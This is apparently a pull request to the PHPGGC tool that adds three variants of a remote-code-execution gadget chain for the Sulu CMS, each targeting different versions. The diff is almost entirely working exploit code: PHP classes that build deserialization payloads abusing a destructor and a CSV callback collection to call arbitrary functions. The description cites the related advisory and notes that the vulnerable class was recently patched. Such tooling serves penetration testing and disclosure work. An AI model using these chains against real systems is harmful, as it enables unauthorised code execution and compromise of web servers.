### PR TITLE
Sulu RCE Gadget Chain

### DIFF
--- a/gadgetchains/Sulu/RCE/1/chain.php
+++ b/gadgetchains/Sulu/RCE/1/chain.php
@@ -1,0 +1,32 @@
+<?php
+
+namespace GadgetChain\Sulu;
+
+use PHPGGC\Exception;
+
+class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '2.5.0+';
+    public static $vector = '__destruct';
+    public static $author = 'mcdruid';
+    public static $information = 'A Fatal error is thrown, but after the payload
+    has been unserialized.';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        $ao = new \ArrayObject([$parameter]);
+        $iterator = $ao->getIterator();
+
+        return new \React\EventLoop\ExtEvLoop( // 2.5.0 to 2.5.19, 2.6.0 to 2.6.2
+        //return new \RectorPrefix202411\React\EventLoop\ExtEvLoop( // 2.5.19+ and 2.6.3 to 2.6.6
+        //return new \RectorPrefix202505\React\EventLoop\ExtEvLoop( // 2.6.7
+            new \Goodby\CSV\Export\Standard\Collection\CallbackCollection(
+               $function,
+               $iterator
+            ),
+        );
+    }
+}

--- a/gadgetchains/Sulu/RCE/1/gadgets.php
+++ b/gadgetchains/Sulu/RCE/1/gadgets.php
@@ -24,12 +24,6 @@ namespace React\EventLoop
             $this->timers = $timers;
         }
     }
-
-    /*
-     * This sort of works, but the payload uses the new class name.
-    class_alias(ExtEvLoop::class, 'RectorPrefix202411\React\EventLoop\ExtEvLoop');
-    class_alias(ExtEvLoop::class, 'RectorPrefix202505\React\EventLoop\ExtEvLoop');
-    */
 }
 
 namespace RectorPrefix202411\React\EventLoop {

--- a/gadgetchains/Sulu/RCE/1/gadgets.php
+++ b/gadgetchains/Sulu/RCE/1/gadgets.php
@@ -1,0 +1,57 @@
+<?php
+
+namespace Goodby\CSV\Export\Standard\Collection
+{
+  class CallbackCollection
+  {
+      private $callable;
+      private $data;
+
+      public function __construct($callable, $data) {
+          $this->callable = $callable;
+          $this->data = $data;
+      }
+  }
+}
+
+namespace React\EventLoop
+{
+    class ExtEvLoop
+    {
+        private $timers;
+
+        public function __construct($timers) {
+            $this->timers = $timers;
+        }
+    }
+
+    /*
+     * This sort of works, but the payload uses the new class name.
+    class_alias(ExtEvLoop::class, 'RectorPrefix202411\React\EventLoop\ExtEvLoop');
+    class_alias(ExtEvLoop::class, 'RectorPrefix202505\React\EventLoop\ExtEvLoop');
+    */
+}
+
+namespace RectorPrefix202411\React\EventLoop {
+    class ExtEvLoop
+    {
+        private $timers;
+
+        public function __construct($timers)
+        {
+            $this->timers = $timers;
+        }
+    }
+}
+
+namespace RectorPrefix202505\React\EventLoop {
+    class ExtEvLoop
+    {
+        private $timers;
+
+        public function __construct($timers)
+        {
+            $this->timers = $timers;
+        }
+    }
+}

--- a/gadgetchains/Sulu/RCE/2/chain.php
+++ b/gadgetchains/Sulu/RCE/2/chain.php
@@ -4,9 +4,9 @@ namespace GadgetChain\Sulu;
 
 use PHPGGC\Exception;
 
-class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
 {
-    public static $version = '2.5.0 <= 2.5.19, 2.6.0 <= 2.6.2';
+    public static $version = '2.5.19+, 2.6.3 <= 2.6.6';
     public static $vector = '__destruct';
     public static $author = 'mcdruid';
     public static $information = 'A Fatal error is thrown, but after the payload
@@ -20,8 +20,8 @@ class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
         $ao = new \ArrayObject([$parameter]);
         $iterator = $ao->getIterator();
 
-        return new \React\EventLoop\ExtEvLoop( // 2.5.0 to 2.5.19, 2.6.0 to 2.6.2
-        //return new \RectorPrefix202411\React\EventLoop\ExtEvLoop( // 2.5.19+ and 2.6.3 to 2.6.6
+        //return new \React\EventLoop\ExtEvLoop( // 2.5.0 to 2.5.19, 2.6.0 to 2.6.2
+        return new \RectorPrefix202411\React\EventLoop\ExtEvLoop( // 2.5.19+ and 2.6.3 to 2.6.6
         //return new \RectorPrefix202505\React\EventLoop\ExtEvLoop( // 2.6.7
             new \Goodby\CSV\Export\Standard\Collection\CallbackCollection(
                $function,

--- a/gadgetchains/Sulu/RCE/2/gadgets.php
+++ b/gadgetchains/Sulu/RCE/2/gadgets.php
@@ -1,0 +1,3 @@
+<?php
+
+require_once(DIR_GADGETCHAINS . '/Sulu/RCE/1/gadgets.php');

--- a/gadgetchains/Sulu/RCE/3/chain.php
+++ b/gadgetchains/Sulu/RCE/3/chain.php
@@ -4,9 +4,9 @@ namespace GadgetChain\Sulu;
 
 use PHPGGC\Exception;
 
-class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall
 {
-    public static $version = '2.5.0 <= 2.5.19, 2.6.0 <= 2.6.2';
+    public static $version = '2.6.7+';
     public static $vector = '__destruct';
     public static $author = 'mcdruid';
     public static $information = 'A Fatal error is thrown, but after the payload
@@ -20,9 +20,9 @@ class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
         $ao = new \ArrayObject([$parameter]);
         $iterator = $ao->getIterator();
 
-        return new \React\EventLoop\ExtEvLoop( // 2.5.0 to 2.5.19, 2.6.0 to 2.6.2
+        //return new \React\EventLoop\ExtEvLoop( // 2.5.0 to 2.5.19, 2.6.0 to 2.6.2
         //return new \RectorPrefix202411\React\EventLoop\ExtEvLoop( // 2.5.19+ and 2.6.3 to 2.6.6
-        //return new \RectorPrefix202505\React\EventLoop\ExtEvLoop( // 2.6.7
+        return new \RectorPrefix202505\React\EventLoop\ExtEvLoop( // 2.6.7
             new \Goodby\CSV\Export\Standard\Collection\CallbackCollection(
                $function,
                $iterator

--- a/gadgetchains/Sulu/RCE/3/gadgets.php
+++ b/gadgetchains/Sulu/RCE/3/gadgets.php
@@ -1,0 +1,3 @@
+<?php
+
+require_once(DIR_GADGETCHAINS . '/Sulu/RCE/1/gadgets.php');

--- a/lib/PHPGGC/GadgetChain.php
+++ b/lib/PHPGGC/GadgetChain.php
@@ -29,7 +29,6 @@ namespace PHPGGC;
  * class for handling CLI, PHPGGC. Refer to their documentation to understand
  * their usage.
  */
-#[\AllowDynamicProperties]
 abstract class GadgetChain
 {
     public $name;

--- a/lib/PHPGGC/GadgetChain.php
+++ b/lib/PHPGGC/GadgetChain.php
@@ -29,6 +29,7 @@ namespace PHPGGC;
  * class for handling CLI, PHPGGC. Refer to their documentation to understand
  * their usage.
  */
+#[\AllowDynamicProperties]
 abstract class GadgetChain
 {
     public $name;


### PR DESCRIPTION
This is the same gadget, but there are 3 variants because rector has changed the namespace of one of the classes over the last several versions.

I've put all of the classes / gadgets into one file and included it from the other two variants. I've also left commented out references to other classes in the chains in order to make it clear what the differences are.

I'm happy for all of that to be arranged in a different way / cleaned up according to the preference of the maintainers.

The main exploitable class has just had protection against this added:

https://github.com/handcraftedinthealps/goodby-csv/security/advisories/GHSA-x3c7-22c8-prg7

We may need to update the versions in these gadget chains depending on which branches the fix is pulled into.